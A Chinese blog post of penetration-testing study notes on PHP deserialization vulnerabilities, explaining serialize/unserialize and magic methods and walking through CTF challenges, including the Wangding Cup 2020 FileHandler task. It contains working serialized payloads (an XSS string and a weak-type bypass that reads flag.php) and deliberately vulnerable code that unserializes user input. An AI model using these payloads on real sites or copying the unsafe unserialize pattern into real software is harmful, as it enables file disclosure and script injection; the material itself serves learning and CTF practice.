第37天-WEB 漏洞-反序列化之 PHP&JAVA 全解(上)

最新推荐文章于 2023-06-18 21:20:44 发布
最新推荐文章于 2023-06-18 21:20:44 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/123763114
版权

导图

请添加图片描述

序列化

序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。

PHP 反序列化

理解这个漏洞前,需要先搞清楚php中serialize(),unserialize()这两个函数。

序列化serialize()

​ 序列化说通俗点就是把一个对象变成可以传输的字符串

​ 比如下面是一个对象:

    class S{
        public $test="pikachu";
    }
    $s=new S(); //创建一个对象
    serialize($s); //把这个对象进行序列化
    序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";}
        O:代表object
        1:代表对象名字长度为一个字符
        S:对象的名称
        1:代表对象里面有一个变量
        s:数据类型
        4:变量名称的长度
        test:变量名称
        s:数据类型
        7:变量值的长度
        pikachu:变量值

反序列化unserialize()

就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。

    $u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");
    echo $u->test; //得到的结果为pikachu

序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题

        常见的几个魔法函数:
        __construct()当一个对象创建时被调用

        __destruct()当一个对象销毁时被调用

        __toString()当一个对象被当作一个字符串使用

        __sleep() 在对象在被序列化之前运行

        __wakeup将在序列化之后立即被调用

        漏洞举例:

        class S{
            var $test = "pikachu";
            function __destruct(){
                echo $this->test;
            }
        }
        $s = $_GET['test'];
        @$unser = unserialize($a);

        payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

触发:unserialize 函数的变量可控,文件中存在可利用的类,类中有魔术方法

魔术方法

魔术方法是一种特殊的方法,当对对象执行某些操作时会覆盖 PHP 的默认操作。

参考php官方文档

php常见魔术方法

  • __construct()//创建对象时触发
  • __destruct() //对象被销毁时触发
  • __call() //在对象上下文中调用不可访问的方法时触发
  • __callStatic() //在静态上下文中调用不可访问的方法时触发
  • __get() //用于从不可访问的属性读取数据
  • __set() //用于将数据写入不可访问的属性
  • __isset() //在不可访问的属性上调用 isset()或 empty()触发
  • __unset() //在不可访问的属性上使用 unset()时触发
  • __invoke() //当脚本尝试将对象调用为函数时触发

知识补充

== (允许类型转换

== 检查——值相等 (值相等)
===检查——值和类型相等(类型和值都要相等)

js在比较的时候如果是 == 会先做类型转换,再判断值得大小,如果是===类型和值必须都相等。

演示案例:

先搞一把 PHP 反序列化热身题稳住-无类问题-本地

在这里插入图片描述

<?php
$key="xiaodi";
echo serialize($key);
?>

序列化结果

s:6:"xiaodi";

在这里插入图片描述

//flag.php

<?php
echo "我爱吃瓜!";
?>

在撸一把 CTF 反序列化小真题压压惊-无类执行-实例

https://ctf.bugku.com/challenges#flag.php

这一题没了!只能截一下视频的图了。

根据提示使用GET传参数hint后显示源码

在这里插入图片描述

代码中了解到,需要用cookie进行传参ISecer

且根据代码可知,(不使用get传参)$key的值为空,

然后按要求对空进行序列化,给$key赋值即可

在这里插入图片描述

在这里插入图片描述

然后抗一把 CTF 反序列化练习题围观下-有类魔术方法触发-本地

特定的操作会触发类中的魔术方法

最后顶一把网鼎杯 2020 青龙大真题舒服下-有类魔术方法触发-实例

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

构造需要的序列化字符串;

<?php
class FileHandler {
public $op=' 2';
public $filename="flag.php";
public $content="liandy";  
}
$flag= new FileHandler();
$flag_1=serialize($flag);
echo $flag_1;
?>

O:11:"FileHandler":3{s:2:"op";s:2:"2";s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"liandy";}

在这里插入图片描述

然后传参

在这里插入图片描述

获取到flag

在这里插入图片描述

解析

<?php class FileHandler{ public $op=' 2';//源码告诉我们 op 为 1 时候是执行写入为 2 时执行读 public $filename="flag.php";//文件开头调用的是 flag.php public $content="xd"; } $flag = new FileHandler(); $flag_1 = serialize($flag); echo $flag_1; ?>

涉及:反序列化魔术方法调用,弱类型绕过,ascii 绕过
使用该类对 flag 进行读取,这里面能利用的只有__destruct 函数(析构函数)。__

destruct 函数对$this->op 进行了===判断

并内容在 2 字符串时会赋值为 1,

process 函数中使用==对$this->op 进行判断(为 2 的情况下才能读取内容),

因此这里存在弱类型比较,可以使用数字 2 或字符串’ 2’绕过判断。
is_valid 函数还对序列化字符串进行了校验,

因为成员被 protected 修饰,因此序列化字符串中会出现 ascii 为 0 的字符。

经过测试,在 PHP7.2+的环境中,使用 public 修饰成员并序列化,反序列化后
成员也会被 public 覆盖修饰。

涉及资源:

http://www.dooccn.com/php/
https://www.ctfhub.com/#/challenge
https://cgctf.nuptsast.com/challenges#Web
https://www.cnblogs.com/20175211lyz/p/11403397.html


<?php
   //test.php 无类
error_reporting(0);
include "flag.php";
$KEY = "xiaodi";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
echo "$flag";
}
show_source(__FILE__);

?>


<?php
//test.php 有类
class ABC{
public $test;
function __construct(){
$test =1;
echo '调用了构造函数<br>';
}
function __destruct(){
echo '调用了析构函数<br>';
}
function __wakeup(){
echo '调用了苏醒函数<br>';
}
}
echo '创建对象 a<br>';
$a = new ABC;
echo '序列化<br>';
$a_ser=serialize($a);
echo '反序列化<br>';
$a_unser = unserialize($a_ser);
echo '对象快要死了!';
?>

<?php
//test.php 有类
class ABC{
public $test;
function __construct(){
$test =1;
echo '调用了构造函数<br>';
}
function __destruct(){
echo '调用了析构函数<br>';
}
function __wakeup(){
echo '调用了苏醒函数<br>';
}
}
echo '创建对象 a<br>';
$a = new ABC;
echo '序列化<br>';
$a_ser=serialize($a);
echo '反序列化<br>';
$a_unser = unserialize($a_ser);
echo '对象快要死了!';
?>
IsecNoob
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第38天:WEB漏洞-序列之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-序列之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的序列漏洞序列漏洞是由于程序在处理序列数据时没有充分验证输入,从而允许攻击者构造...
第37天:WEB漏洞-序列之PHP&JAVA全解(上)1
08-03
WEB漏洞-序列之PHP&JAVA全解(上) 在 WEB 应用程序中,序列是一种常见的漏洞,攻击者可以通过序列来控制代码执行、SQL 注入、目录遍历等不可控后果。在 PHP 和 JAVA 中,序列漏洞尤其常见,本文将...
37:WEB漏洞-序列PHP&JAVA全解(上)
mingyqf的博客
04-17 2864
参考:https://www.cnblogs.com/zhengna/p/15661109.html 本文为学习,复现笔记,侵删 思维导图 知识点 【PHP 序列】 概念:序列就是将对象转换成字符串,序列,数据的格式的转换对象的序列利于对象的保存和传输,也可以让多个文件共享对象 原理:未对用户输入的序列字符串进行检测,导致攻击者可以控制序列过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。 在序列的过程中自动触发了某些魔术方法。当进行序列的时候就有可能会触发对象中
web漏洞-序列PHP&JAVA全解(上)(37)
san3144393495的博客
06-18 1580
在这给过程中,会涉及到一种叫做有类和无类的情况,开发里面经常看到的一个东西,我们称之为类,类对象,存在类的话,在类里面有一些内置的魔术方法,如果有类用到序列这个操作,就会触发到里面的魔术方法,有时候在不经意之间就会和其他漏洞相互组合。原理:未对用户输入的序列字符串进行检测,导致攻击者可以控制序列过程,从而导致代码执行,sql注入,目录遍历等不可控的后果。相关的开发语言进行序列就会转换成二进制,xml,json数据,这种数据序列就会转换成开发语言,代码形式。数据格式类型的相互转换。
java序列漏洞利用工具_PHP序列漏洞说明
weixin_39904116的博客
11-14 229
序列PHP程序为了保存和转储对象,提供了序列的方法,序列是为了在程序运行的过程中对对象进行转储而产生的。序列可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。PHP序列的函数为serialize,序列的函数为unserialize.举个栗子:...
详解PHP序列漏洞
LYJ20010728的博客
05-23 2646
PHP序列学习序列序列定义常见使用情况常见的序列格式序列中常见的魔术方法序列绕过protected和private绕过__wakeup绕过(CVE-2016-7124)引用利用16进制绕过字符过滤同名方法的利用绕过部分正则字符逃逸字符增多字符减少 序列序列 定义 序列(串行):是将变量转换为可保存或传输的字符串的过程; 序列串行):就是在适当的时候把这个字符串再转成原来的变量使用; 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性; 常见的php
bugku web-安慰奖-考查序列和魔术方法
weixin_46578840的博客
09-04 300
打开网址发现一片空白 审查源代码发现一串base,解码得到备份 打开查看发现源代码, <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __
ShiroExp-1.3.1-all.jar shiro序列检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列检测工具 我这里是用于搭建攻防演练演示环境用
java 序列利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
64-64.渗透测试-PHP序列序列.mp4
最新发布
05-10
64-64.渗透测试-PHP序列序列.mp4
php序列部分学习
qq_63267612的博客
07-24 328
_isset()//在不可访问的属性上调用isset()或empty()触发。//a为要序列的对象(序列结果开头是a,不影响作为数组元素的$a的析构)__wakeup()//执行unserialize()时,先会调用这个函数。__callStatic()//在静态上下文中调用不可访问的方法时触发。__unset()//在不可访问的属性上使用unset()时触发。__call()//在对象上下文中调用不可访问的方法时触发。__set()//用于将数据写入不可访问的属性。...
面试php序列、java序列原理和常见函数
m0_52556798的博客
03-18 3239
关于序列,我更多的只是针对php和Java,把原理看懂了点,后面还会对序列进行详细总结 1.什么是序列序列序列即将对象转为字节流,便于保存在文件,内存,数据库中;序列即将字节流转为对象 也就是把数据转为一种可逆的数据结构,再把这种可逆的数据结构转回数据,这就是序列序列 用途:   1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;   2) 在网络上传送对象的字节序列。 php序列序列的函数:string serialize ( mixed
序列漏洞-----(1) 什么是序列序列和魔法函数
Z_Grant的博客
11-11 1107
文章目录一、基础概念 一、基础概念 序列序列是开发过程中不可或缺的一步,简单来说,序列是将对象转换成字节流的过程,而序列的是将字节流恢复成对象的过程。两者的关系如下: 序列: 将数据结构或对象转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程 目的 ①以某种存储形式使自定义对象持久; ②将对象从一个地...
WEB漏洞-序列PHP&JAVA全解(上)
xhscxj的博客
02-03 830
PHP 序列 原理:未对用户输入的序列字符串进行检测,导致攻击者可以控制序列过程,从而导致代码 执行,SQL 注入,目录遍历等不可控后果。在序列的过程中自动触发了某些魔术方法。当进行 序列的时候就有可能会触发对象中的一些魔术方法。 serialize() //将一个对象转换成一个字符串 unserialize() //将字符串还原成一个对象 触发:unserialize 函数的变量可控,文件中存在可利用的类,类中有魔术方法: 参考:https://www.cnblogs.com/2.
php序列java_PHP序列漏洞代码审计
weixin_42134338的博客
02-25 180
1、什么是序列A、PHP网站的定义:所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。按个人理解就是:serialize()将一个对象转换成一个字符串,unserialize()将字符串还原为一个对象。当然从本...
JAVA序列漏洞简述
告白的博客
08-08 2315
0x00 漏洞原理 我们需要保存某一个对象的某一一个时间的状态信息,进行一些操作,比如利用序列将程序运行的对象状态以二进制形式储存在文件系统中,然后可以在另外一个程序中对序列后的对象状态数据进行序列操作回复对象,可以有效的实现多平台之间的通信,对象持久储存。 0x01 漏洞描述必备*知识点* #序列序列 序列 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列期间,对象将其当前状态写入到临时或持久性存储区。 序列:从存储区中读取该数据,并将
java序列php序列的对象
weixin_30340617的博客
05-29 213
最近工作中遇到一个需要解析php序列后存入DB的array, a:4:{i:0;a:2:{s:11:"province";s:8:"0016";s:7:"img";s:49:"20150117105023_kk-1.jpg";} i:1;a:2:{s:11:"province";s:8:"0017";s:7:"img";s:49:"20150117105025_kk-1.jpg";}} ...
序列(Unserialize)题目讲解
qq_49422880的博客
10-05 5640
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
php序列语句实例,PHP序列的一些例子
weixin_34006872的博客
03-11 575
之前web一直被PHP序列的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般序列能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(), sleep(),wakeup(), toString().首先我们以constr...
Java对象序列序列详解
"Java对象的序列序列技术详解" Java对象的序列序列是Java编程中的一项重要技术,它允许我们将Java对象转换为字节流,以便于存储或在网络中传输。这章内容主要涵盖以下几个方面: 1. **对象序列...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值